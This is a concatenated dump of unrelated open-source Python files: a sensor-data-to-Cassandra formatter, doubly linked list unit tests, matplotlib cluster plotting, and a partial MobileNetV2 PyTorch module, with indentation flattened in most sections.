parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_twenty_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_fifteen_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_ten_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_five_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_one_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_one_sec_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def run_update(config_file, args):
file = config_file[args.station][args.file]
num_of_new_rows = 0
if (file.get('table') == 'daily_single_measurements_by_sensor'):
num_of_new_rows = process_daily_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'hourly_single_measurements_by_sensor'):
num_of_new_rows = process_hourly_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'thirty_min_single_measurements_by_sensor'):
num_of_new_rows = process_thirty_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'twenty_min_single_measurements_by_sensor'):
num_of_new_rows = process_twenty_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'fifteen_min_single_measurements_by_sensor'):
num_of_new_rows = process_fifteen_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'ten_min_single_measurements_by_sensor'):
num_of_new_rows = process_ten_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'five_min_single_measurements_by_sensor'):
num_of_new_rows = process_five_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_min_single_measurements_by_sensor'):
num_of_new_rows = process_one_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_sec_single_measurements_by_sensor'):
num_of_new_rows = process_one_sec_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'daily_profile_measurements_by_sensor'):
num_of_new_rows = process_daily_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'hourly_profile_measurements_by_sensor'):
num_of_new_rows = process_hourly_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'thirty_min_profile_measurements_by_sensor'):
num_of_new_rows = process_thirty_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'twenty_min_profile_measurements_by_sensor'):
num_of_new_rows = process_twenty_min_profile_measurements_by_sensor(args.station, file)
    elif (file.get('table') == 'fifteen_min_profile_measurements_by_sensor'):
num_of_new_rows = process_fifteen_min_profile_measurements_by_sensor(args.station, file)
    elif (file.get('table') == 'ten_min_profile_measurements_by_sensor'):
        num_of_new_rows = process_ten_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'five_min_profile_measurements_by_sensor'):
num_of_new_rows = process_five_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_min_profile_measurements_by_sensor'):
num_of_new_rows = process_one_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_sec_profile_measurements_by_sensor'):
num_of_new_rows = process_one_sec_profile_measurements_by_sensor(args.station, file)
if args.track:
if num_of_new_rows > 0:
first_line_num = file.get('first_line_num', 0)
new_line_num = first_line_num + num_of_new_rows
logger_info.info("Updated up to line number {num}".format(num=new_line_num))
config_file[args.station][args.file]['first_line_num'] = new_line_num
logger_info.info("Done processing table {table}".format(table=file.get('table')))
if args.track:
logger_info.info("Updating config file.")
utils.save_config(APP_CONFIG_PATH, config_file)
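# A sketch of an alternative to the if/elif chain in run_update above: a
# dispatch table keyed on the config's 'table' value. Only three entries are
# shown here; a full table would register every processor in this module.
TABLE_PROCESSORS = {
    'daily_single_measurements_by_sensor': process_daily_single_measurements_by_sensor,
    'hourly_single_measurements_by_sensor': process_hourly_single_measurements_by_sensor,
    'one_sec_profile_measurements_by_sensor': process_one_sec_profile_measurements_by_sensor,
}
def dispatch_process(station, file):
    """Run the processor registered for file['table']; 0 new rows if unknown."""
    processor = TABLE_PROCESSORS.get(file.get('table'))
    return processor(station, file) if processor is not None else 0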
def main():
"""Parses and validates arguments from the command line. """
parser = argparse.ArgumentParser(
prog='CassandraFormatter',
description='Program for formatting and storing logger data to Cassandra database.'
)
parser.add_argument('-s', '--station', action='store', dest='station',
help='Station to process.')
parser.add_argument('-f', '--file', action='store', dest='file',
help='File to process.')
parser.add_argument(
'-t', '--track',
help='Track file line number.',
dest='track',
action='store_true',
default=False
)
args = parser.parse_args()
if not args.station or not args.file:
parser.error("--station and --file is required.")
app_cfg = utils.load_config(APP_CONFIG_PATH)
run_update(app_cfg, args)
if __name__=='__main__':
main()
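# For reference, a minimal sketch of the structure run_update expects from
# utils.load_config(APP_CONFIG_PATH). Every name and value below is
# hypothetical; the real stations, files, and ids live in the deployment's
# config file:
#
# {
#     'station_a': {
#         'logger.dat': {
#             'table': 'hourly_single_measurements_by_sensor',
#             'path': '/data/station_a/logger.dat',
#             'header_row': 1,
#             'first_line_num': 0,
#             'time_zone': 'UTC',
#             'to_utc': True,
#             'parse_time_columns': True,
#             'time_columns': ['TIMESTAMP'],
#             'time_format_args_library': ['%Y-%m-%d %H:%M:%S'],
#             'parameters': {
#                 'AirTC_Avg': {
#                     'parameter_id': 1,
#                     'sensor_id': 42,
#                     'unit': 'degC',
#                     'value_type': 'avg_value',
#                 },
#             },
#         },
#     },
# }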
--- test/doublylinkedlist_test.py (ruyadorno/simple-data-structures, MIT) ---
import unittest
from doublylinkedlist import DoublyLinkedList, DoublyLinkedListNode, DoublyLinkedListError
class TestDoublyLinkedList(unittest.TestCase):
def test_create_new_linked_list(self):
dl_list = DoublyLinkedList()
self.assertIsInstance(dl_list, DoublyLinkedList)
def test_create_new_linked_list_from_list(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertIsInstance(dl_list, DoublyLinkedList)
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(dl_list.lastnode().value, 3)
def test_create_new_linked_list_one_elem(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(dl_list.lastnode().value, 1)
def test_sentinel_nodes_should_not_be_listed(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(dl_list.firstnode().next(), None)
self.assertEqual(dl_list.firstnode().prev(), None)
def test_firstnode_on_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(dl_list.firstnode(), None)
def test_lastnode_on_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(dl_list.lastnode(), None)
def test_items_iterator(self):
dl_list = DoublyLinkedList([1, 2, 3])
count = 0
for i in dl_list.items():
self.assertIsInstance(i, DoublyLinkedListNode)
self.assertGreater(i.value, 0)
count += 1
self.assertEqual(count, 3)
def test_insert_before(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertBefore(4, dl_list.lastnode().prev())
self.assertEqual(dl_list.lastnode().prev().prev().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_before_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertBefore(4, dl_list.firstnode())
self.assertEqual(dl_list.firstnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_after(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertAfter(4, dl_list.firstnode())
self.assertEqual(dl_list.firstnode().next().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_after_last_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertAfter(4, dl_list.lastnode())
self.assertEqual(dl_list.lastnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_remove_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.lastnode().prev())
self.assertEqual(dl_list.lastnode().prev().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_node_unique_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
dl_list.removeNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_node_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode().value, 2)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_node_last_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.lastnode())
self.assertEqual(dl_list.lastnode().value, 2)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_before(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeBeforeNode(dl_list.lastnode())
self.assertEqual(dl_list.lastnode().prev().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_before_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
with self.assertRaises(DoublyLinkedListError):
dl_list.removeBeforeNode(dl_list.firstnode())
def test_remove_after(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeAfterNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode().next().value, 3)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_after_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
with self.assertRaises(DoublyLinkedListError):
dl_list.removeAfterNode(dl_list.lastnode())
def test_remove_all_in_between(self):
dl_list = DoublyLinkedList([1, 2, 3, 4, 5, 6])
self.assertEqual(len([i for i in dl_list.items()]), 6)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode().next(), dl_list.lastnode().prev())
self.assertEqual(len([i for i in dl_list.items()]), 4)
self.assertEqual(len([i for i in new_list.items()]), 2)
self.assertEqual(new_list.firstnode().value, 3)
def test_remove_all_in_between_single_item(self):
dl_list = DoublyLinkedList([1, 2, 3, 4, 5, 6])
self.assertEqual(len([i for i in dl_list.items()]), 6)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode(), dl_list.firstnode().next().next())
self.assertEqual(len([i for i in dl_list.items()]), 5)
self.assertEqual(len([i for i in new_list.items()]), 1)
self.assertEqual(new_list.firstnode().value, 2)
def test_remove_all_in_between_empty(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode(), dl_list.firstnode().next())
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(len([i for i in new_list.items()]), 0)
self.assertEqual(new_list.firstnode(), None)
def test_insert_first_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertFirstNode(4)
self.assertEqual(dl_list.firstnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_first_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
dl_list.insertFirstNode(1)
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 1)
def test_insert_last_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertLastNode(4)
self.assertEqual(dl_list.lastnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_last_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
dl_list.insertLastNode(1)
self.assertEqual(dl_list.lastnode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 1)
def test_remove_first_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(dl_list.removeFirstNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_first_node_single_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
self.assertEqual(dl_list.removeFirstNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_first_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
self.assertEqual(dl_list.removeFirstNode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_last_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(dl_list.removeLastNode().value, 3)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_last_node_single_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
self.assertEqual(dl_list.removeLastNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_last_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
self.assertEqual(dl_list.removeLastNode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
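# A short usage sketch of the API exercised by the tests above. This block is
# illustrative only and is not part of the original test module; it assumes
# the doublylinkedlist module from this repo is importable.
if __name__ == '__main__':
    dl = DoublyLinkedList([1, 2, 3])
    dl.insertFirstNode(0)             # 0, 1, 2, 3
    dl.insertAfter(4, dl.lastnode())  # 0, 1, 2, 3, 4
    dl.removeNode(dl.firstnode())     # 1, 2, 3, 4
    print([node.value for node in dl.items()])  # [1, 2, 3, 4]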
--- odoo-13.0/addons/base_import_module/models/__init__.py (VaibhavBhujade/Blockchain-ERP-interoperability, MIT) ---
# -*- coding: utf-8 -*-
# flake8: noqa
from . import base_import_module
from . import ir_module
from . import ir_ui_view
--- acorns/plotting.py (jdhenshaw/leodis, MIT) ---
# Licensed under an MIT open source license - see LICENSE
"""
acorns - Agglomerative Clustering for ORgansing Nested Structures
Copyright (c) 2017 Jonathan D. Henshaw
CONTACT: j.d.henshaw@ljmu.ac.uk
"""
import numpy as np  # used by np.linspace below; missing from the original imports
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import colors
def plot_scatter(self):
fig = plt.figure(figsize=( 8.0, 8.0))
if self.method == 0:
ax = fig.add_subplot(111)
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.scatter(self.data[0,:], self.data[1,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
                ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
                           marker='o', s=3., c='black', linewidth=0, alpha=0.7)
                # 2D axes: the stray third positional argument and the 3D-only
                # depthshade keyword from the original call are dropped here.
                ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
                           marker='o', s=10., c='None', edgecolors=c, alpha=0.9, linewidth=0.8)
            else:
                ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
                           marker='o', s=3., c='black', linewidth=0, alpha=0.7)
                ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
                           marker='o', s=10., c='None', edgecolors=c, alpha=0.9, linewidth=0.8)
plt.draw()
plt.show()
if self.method == 1:
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.scatter(self.data[0,:], self.data[1,:], self.data[4,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
else:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
plt.draw()
plt.show()
if self.method==2:
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.scatter(self.data[0,:], self.data[1,:], self.data[2,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
else:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
plt.draw()
plt.show()
--- mobilenet.py (QFaceblue/Driving-Behavior-Recognition, Apache-2.0) ---
import torch  # used by torch.clamp in the blocks below
from torch import nn
import torch.nn.functional as F  # used by hard_sigmoid
__all__ = ['MobileNetV2']
def _make_divisible(v, divisor, min_value=None):
"""
This function is taken from the original tf repo.
It ensures that all layers have a channel number that is divisible by 8
It can be seen here:
https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
:param v:
:param divisor:
:param min_value:
:return:
"""
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
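# Worked examples of the rounding rule above (divisor 8, default min_value).
# These values follow directly from the arithmetic; they are not in the
# original file:
#   _make_divisible(24, 8) -> 24   (already a multiple of 8)
#   _make_divisible(13, 8) -> 16   (rounds to the nearest multiple)
#   _make_divisible(7, 8)  -> 8    (clamped up to min_value)
#   _make_divisible(10, 8) -> 16   (8 would drop more than 10%, so the guard bumps it up)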
class ConvBNReLU(nn.Sequential):
def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None):
padding = (kernel_size - 1) // 2
if norm_layer is None:
norm_layer = nn.BatchNorm2d
super(ConvBNReLU, self).__init__(
nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),
norm_layer(out_planes),
nn.ReLU6(inplace=True)
)
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
hidden_dim = int(round(inp * expand_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
layers = []
if expand_ratio != 1:
# pw
layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer))
layers.extend([
# dw
ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
norm_layer(oup),
])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
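# A shape sketch for the block above; the sizes are hypothetical and this
# helper is not part of the original module:
def _inverted_residual_shape_check():
    block = InvertedResidual(inp=32, oup=64, stride=2, expand_ratio=6)
    x = torch.randn(1, 32, 56, 56)
    y = block(x)  # the stride-2 depthwise conv halves the spatial dims
    assert y.shape == (1, 64, 28, 28)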
class Sandglass(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(Sandglass, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
layers = []
layers.extend([
# dw
ConvBNReLU(inp, inp, stride=1, groups=inp, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),
norm_layer(hidden_dim),
# pw-relu6
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
norm_layer(oup),
nn.ReLU6(inplace=True),
# dw-liner
nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False),
norm_layer(oup),
])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
class My_Sandglass(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(My_Sandglass, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self.act = nn.ReLU6(inplace=True)
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
self.dw1 = nn.Conv2d(inp, inp, 3, 1, 1, groups=inp, bias=False)
self.bn1 = norm_layer(inp)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(inp, hidden_dim)
